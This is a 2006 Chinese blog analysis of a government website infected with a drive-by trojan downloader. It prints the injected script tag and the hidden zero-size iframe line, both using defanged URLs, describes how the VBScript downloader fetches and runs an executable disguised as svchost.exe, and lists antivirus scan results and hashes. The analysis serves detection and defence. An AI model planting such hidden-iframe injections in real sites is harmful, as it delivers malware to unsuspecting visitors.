一个被挂木马的政府网站

endurer　原创
2006-09-21　第1版

该网站首页被加入代码：
/--------
＜script language="JavaScript" src="hxxp://www***.zhu**jiang***q*h*.com/images/ad.js"＞＜/script＞
--------/

ad.js　的内容为：
/--------
document.write("＜iframe src=hxxp://www***.zhu**jiang***q*h*.com/images/ad***.htm width=0 height=0＞＜/iframe＞");
--------/

ad***.htm　Kaspersky报为：Trojan-Downloader.VBS.Small.av，瑞星报为 Trojan.DL.VBS.Agent.l，其内容为Encode加密的VBScript脚本代码，利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件会下载 hxxp://www***.zhu**jiang***q*h*.com/images/baidu.exe，保存为 %temp%/svchost.exe，并利用Shell.Application 对象的 ShellExecute 方法来运行。

baidu.exe　瑞星报为 Trojan.DL.Small.tk。

Complete scanning result of "baidu.exe.del", received in VirusTotal at 09.21.2006, 14:50:42 (CET).

Antivirus	Version	Update	Result
AntiVir	7.2.0.16	09.21.2006	HEUR/Malware
Authentium	4.93.8	09.21.2006	no virus found
Avast	4.7.844.0	09.19.2006	Win32:Tiny-K
AVG	386	09.20.2006	Downloader.Generic.RRD
BitDefender	7.2	09.21.2006	Generic.Malware.dld!!.17ADDB55
CAT-QuickHeal	8.00	09.20.2006	(Suspicious) - DNAScan
ClamAV	devel-20060426	09.21.2006	no virus found
DrWeb	4.33	09.21.2006	Trojan.DownLoader.4554
eTrust-InoculateIT	23.73.1	09.21.2006	no virus found
eTrust-Vet	30.3.3090	09.21.2006	no virus found
Ewido	4.0	09.21.2006	no virus found
Fortinet	2.82.0.0	09.20.2006	suspicious
F-Prot	3.16f	09.21.2006	no virus found
F-Prot4	4.2.1.29	09.21.2006	no virus found
Ikarus	0.2.65.0	09.20.2006	no virus found
Kaspersky	4.0.2.24	09.21.2006	Trojan-Downloader.Win32.Tiny.y
McAfee	4856	09.20.2006	no virus found
Microsoft	1.1560	09.21.2006	no virus found
NOD32v2	1.1765	09.20.2006	a variant of Win32/TrojanDownloader.Tiny.Y
Norman	5.90.23	09.21.2006	W32/Suspicious_U.gen
Panda	9.0.0.4	09.21.2006	Suspicious file
Sophos	4.09.0	09.21.2006	no virus found
Symantec	8.0	09.21.2006	no virus found
TheHacker	6.0.1.075	09.21.2006	no virus found
UNA	1.83	09.20.2006	no virus found
VBA32	3.11.1	09.21.2006	no virus found
VirusBuster	4.3.7:9	09.20.2006	no virus found

Aditional Information
File size: 1416 bytes
MD5: ad492c5aded7310ee2289838622d5827
SHA1: d45b3846691d33cf9374600449688a8c5e2276af
packers: UPack

一个被挂木马的政府网站相关推荐

一个被挂上木马Trojan-Dropper.MSWord.Lafool.i的政府网站
今天上午8点多,打开一个经常访问的政府网站hxxp://www.**ny.gov.cn,卡巴斯基报警,发现Trojan-Dropper.MSWord.Lafool.i: 中午12点多再此访问此网站,卡 ...
美国两政府网站被挂马以性丑闻女星为诱饵
据安全厂商趋势科技称,美国两个政府网站近日发现被挂木马,这两家被挂马的网站都是以性丑闻女性为诱饵欺骗用户访问其它恶意网页. 圣伯纳迪诺县的宣传页面被发现感染了恶意木马,用户访问该网站时被重定向到域名V ...
天道有轮回！网络诈骗之国尼日利亚政府网站被挂钓鱼网站
今天愚人节,然而. 上面这个是我无误了. 那么今天为了应景,就来聊聊和骗人相关的: 尼日利亚骗局作为了一个商务电邮欺诈攻击(BEC)盛行之国:尼日利亚,号称拥有全球规模最大的鱼叉攻击类黑客组织,甚至 ...
正确设置nginx/php-fpm/apache权限提高网站安全性防止被挂木马
2019独角兽企业重金招聘Python工程师标准>>> 核心总结:php-fpm/apache 进程所使用的用户,不能是网站文件所有者. 凡是违背这个原则,则不符合最小权限原则. 根 ...
网站被挂木马病毒了，怎么办？
A.为什么好好的网站会有木马? 一般木马是来自ASP SHELL和PHP SHELL的程序段控制不严,程序上有上传功能,没有进行文件目录和文件后缀等的判断,一般这类的目录,以"海阳顶端网AS ...
正确设置 php-fpm子进程用户提高网站安全性防止被挂木马
核心总结:php-fpm 子进程所使用的用户,不能是网站文件所有者. 凡是违背这个原则,则不符合最小权限原则. 根据生产环境不断反馈,发现不断有 php网站被挂木马,绝大部分原因是因为权限设置不合理造 ...
网站被挂木马，中毒了
网站被挂木马,中毒了 ,在每个conn.asp index.asp defaut.asp index.html index.aspx default.aspx代码中都被加了如下的语句: <ifr ...
如何有效防止DEDE织梦系统被挂木马安全设置（仅供参考）
尊敬的客户,您好! 感谢广大客户对我司工作的信任和支持! 我司在最近的一个多月内陆续发现多起因 DedeCMS 安全漏洞造成网站被上传恶意脚本的事件,入侵者可利用恶意脚本对外发送大量数据包,严重占用C ...
Dede cms文章内容管理系统安全漏洞!如何有效防止DEDE织梦系统被挂木马安全设置...
第一.安装Dede的时候数据库的表前缀,最好改一下,不要用dedecms默认的前缀dede_,可以改成ljs_,随便一个无规律的.难猜到的前缀即可. 第二.后台登录一定要开启验证码功能,将默认管理员a ...

一个被挂木马的政府网站

一个被挂木马的政府网站相关推荐

最新文章

热门文章